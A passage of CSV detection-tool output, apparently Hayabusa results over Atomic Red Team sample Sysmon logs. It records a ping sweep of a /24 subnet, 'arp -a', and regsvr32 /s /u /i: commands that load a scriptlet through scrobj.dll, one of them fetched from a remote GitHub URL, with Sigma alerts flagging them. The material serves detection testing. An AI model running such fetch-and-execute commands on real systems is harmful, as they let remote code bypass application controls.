747F3D96-D965-5D31-0000-0010C73C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.222 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1220 | PGUID: 747F3D96-D965-5D31-0000-0010B53F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.004 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.223 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-D965-5D31-0000-0010A1423700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:26.430 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.224 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D966-5D31-0000-00108D453700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.225 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
| LID: 0x50951 | PID: 6632 | PGUID: 747F3D96-D967-5D31-0000-00107C483700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:27.555 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.226 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5844 | PGUID: 747F3D96-D967-5D31-0000-0010BB513700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.227 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6396 | PGUID: 747F3D96-D968-5D31-0000-001001553700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:28.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.228 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1452 | PGUID: 747F3D96-D968-5D31-0000-0010F3573700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.229 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-D969-5D31-0000-0010DF5A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:29.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.230 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4004 | PGUID: 747F3D96-D969-5D31-0000-0010CB5D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.034 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.231 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D96A-5D31-0000-0010B7603700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:30.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.232 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D96A-5D31-0000-0010A3633700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.233 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D96B-5D31-0000-001090663700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:31.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.234 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5016 | PGUID: 747F3D96-D96B-5D31-0000-00107C693700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.235 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D96C-5D31-0000-00106A6C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:32.614 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.236 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-D96C-5D31-0000-0010BA763700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.237 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3228 | PGUID: 747F3D96-D96D-5D31-0000-0010A7793700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:33.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.238 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D96D-5D31-0000-0010937C3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.005 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.239 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D96D-5D31-0000-0010827F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.024 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 
747F3D96-D974-5D31-0000-001068B33700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 
747F3D96-D976-5D31-0000-0010DBCC3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: 
C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u 
/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 
